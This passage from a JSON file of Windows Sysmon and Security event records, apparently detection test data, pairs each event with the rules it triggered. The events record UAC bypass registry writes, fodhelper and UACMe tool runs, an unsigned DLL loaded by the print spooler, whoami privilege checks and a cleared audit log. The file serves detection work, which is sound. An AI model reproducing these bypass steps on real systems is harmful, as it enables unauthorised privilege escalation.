02:52:18.765","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wscript.exe.manifest","UtcTime":"2019-05-09 02:52:18.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11219,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:52:18.765888Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2018-01-03 01:21:25.726","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-95E7-5CD3-0000-001046950F00","ProcessId":2812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData:tghjx5xz2ky.vbs","UtcTime":"2019-05-09 02:52:23.500"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11241,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:52:23.500263Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5272,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:14:02.929209Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5273,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:14:02.934826Z"}},"Version":2}}}},{"detection":["Bypass UAC via Fodhelper.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\fodhelper.exe\" ","ParentImage":"C:\\Windows\\System32\\fodhelper.exe","ParentProcessGuid":"747F3D96-5E6F-5D45-0000-001014CA9D00","ParentProcessId":8180,"ProcessGuid":"747F3D96-5E70-5D45-0000-0010FCDD9D00","ProcessId":3656,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 10:14:08.401"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5277,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:14:08.472102Z"}},"Version":5}}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe\" 64","Company":"Integrity Investment LLC","CurrentDirectory":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\","Description":"Pentesting utility","FileVersion":"3.5.1.2010","Hashes":"SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891","Image":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe","IntegrityLevel":"Medium","LogonGuid":"23F38D93-AE9B-5F8E-8CED-170000000000","LogonId":"0x17ed8c","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"23F38D93-AF70-5F8E-1E02-000000000C00","ParentProcessId":5592,"ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"Product":"UACMe","RuleName":"technique_id=T1059.001,technique_name=PowerShell","TerminalSessionId":2,"User":"DESKTOP-NTSSLJD\\den","UtcTime":"2020-10-20 11:50:54.800"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":1,"EventRecordID":622,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":9748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:54.810152Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using IEInstal - File","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-20 11:50:55.442","Image":"C:\\Program Files\\Internet Explorer\\IEInstal.exe","ProcessGuid":"23F38D93-CF1F-5F8E-CA08-000000000C00","ProcessId":8736,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:55.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":768,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":9748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:55.450643Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-20 11:50:56.082","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:56.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":877,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":9748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:56.090214Z"}},"Version":2}}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Integrity Investment LLC","Description":"UACMe proxy DLL","FileVersion":"3.5.1.2010","Hashes":"SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6","Image":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","ImageLoaded":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","OriginalFileName":"Fubuki.dll","ProcessGuid":"23F38D93-CF20-5F8E-CE08-000000000C00","ProcessId":6896,"Product":"UACMe","RuleName":"technique_id=T1073,technique_name=DLL Side-Loading","Signature":"-","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-20 11:50:56.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":7,"EventRecordID":964,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":5064}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:56.531639Z"}},"Version":3}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 10:51:46.599","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6742-5D45-0000-00104A66B500","ProcessId":6380,"RuleName":"PrivEsc - UAC Bypass UACME 32","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll","UtcTime":"2019-08-03 10:51:46.599"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5305,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:51:46.647421Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\System32\\cmd.exe /c notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\exefile\\shell\\runas\\command\\IsolatedCommand","UtcTime":"2019-05-09 02:07:51.100"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11122,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:07:51.116072Z"}},"Version":2}}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"?","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-8B77-5CD3-0000-0010E8FD2900","ParentProcessId":3836,"ProcessGuid":"365ABB72-8B80-5CD3-0000-001065512A00","ProcessId":2264,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 02:08:00.336"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11126,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:08:00.446150Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"alice.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":25048,"Execution":{"#attributes":{"ProcessID":748,"ThreadID":6064}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-11-15T08:19:02.298512Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x1c363a4","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-1005675359-741490361-30848483-1108"}}}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Microsoft Application Virtualization Terminator","FileVersion":"10.0.18362.1 (WinBuild.160101.0800)","Hashes":"SHA1=D66B48C663F435419913D65E64ED4845CB9BC882,MD5=0419B6B1CCE7FA295A3DC1823E0AD685,SHA256=60BCF03195AE55304114E4AECD800C15C3F15DDDC91B742B4F5A9624494CCA65,IMPHASH=F578F8B5F8EA1AA29D7B69CDB8565B2E","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\AppVTerminator.dll","ProcessGuid":"6A3C3EF2-8168-5FBF-0000-0010435A0100","ProcessId":2032,"Product":"Microsoft® Windows® Operating System","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-11-26 10:45:07.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343368,"Execution":{"#attributes":{"ProcessID":8124,"ThreadID":7540}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T10:45:07.686999Z"}},"Version":3}}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=4B0D3EF916C4D5E4249DC62E0A1A2307C495E3FB,MD5=C957DB23045704214C1A53260598FC85,SHA256=7C1B045BB80761F9E9EDD9B8B7A53D9C374CA0C78926F7AEE1EACCC32EC3B198,IMPHASH=8DEF796746DD54062D5B3186EEF39356","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\spool\\drivers\\x64\\4\\payload.dll","ProcessGuid":"6A3C3EF2-8739-5FBF-0000-001075514700","ProcessId":8716,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-11-26 10:45:23.976"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343371,"Execution":{"#attributes":{"ProcessID":8124,"ThreadID":7540}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T10:45:24.216387Z"}},"Version":3}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-7D80-5CD5-0000-00100AD01300","ProcessId":2796,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-10 13:32:48.397"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15676,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:32:48.412971Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery","Run Whoami Showing Privileges"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /priv","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-79DF-5CD5-0000-0020F8410100","LogonId":"0x141f8","ParentCommandLine":"\"c:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-7D86-5CD5-0000-0010CC2E1400","ParentProcessId":2076,"ProcessGuid":"365ABB72-7DA9-5CD5-0000-00100ED31400","ProcessId":2524,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-10 13:33:29.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":15678,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:33:29.424885Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\Windows\\SysWOW64\\notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9DB0-5D46-0000-00108243AF03","ProcessId":3580,"RuleName":"PrivEsc - UAC bypass UACME-45","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 08:56:16.635"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5664,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T08:56:16.650581Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.751","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man","UtcTime":"2020-08-25 10:08:05.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358988,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.763694Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358989,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.770148Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358990,"Execution":{"#attributes":{"ProcessID":3156,"ThreadID":112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-25T10:08:05.772810Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 